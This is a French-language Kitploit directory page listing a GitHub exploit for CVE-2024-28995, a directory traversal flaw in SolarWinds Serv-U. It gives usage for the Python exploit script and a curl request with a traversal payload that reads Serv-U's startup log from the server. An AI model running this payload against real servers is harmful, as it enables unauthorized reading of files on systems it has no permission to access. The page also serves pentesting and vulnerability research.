Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2024-28995 — Exploit pour CVE-2024-28995 | Kitploit
Outils/GitHubGitHub/0xc4t/cve-2024-28995
Analyse des VulnérabilitésExploitationExploitation d'Applications WebCollecte d'InformationsTests d'Intrusion
GitHub0xc4t/cve-2024-28995

CVE-2024-28995

Exploit pour CVE-2024-28995

Voir le dépôt
21il y a 2 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit pour CVE-2024-28995

Le 5 juin 2024, SolarWinds a publié un avis concernant CVE-2024-28995, une vulnérabilité de traversée de répertoire de haute sévérité affectant sa solution de transfert de fichiers Serv-U. La vulnérabilité a été découverte par le chercheur Hussein Daher de Web Immunify.

Utilisation de l'exploit

root@kitploit:~
python3 CVE-2024-28995.py -t http://example.com/ -f somefile

Utilisation de Curl

root@kitploit:~
curl -i -k --path-as-is "http://<target>/?InternalDir=/../../../../ProgramData/RhinoSoft/Serv-U/&InternalFile=Serv-U-StartupLog.txt"

Référence:

  • https://attackerkb.com/topics/2k7UrkHyl3/cve-2024-28995/rapid7-analysis
  • https://nvd.nist.gov/vuln/detail/CVE-2024-28995
Télécharger l’outil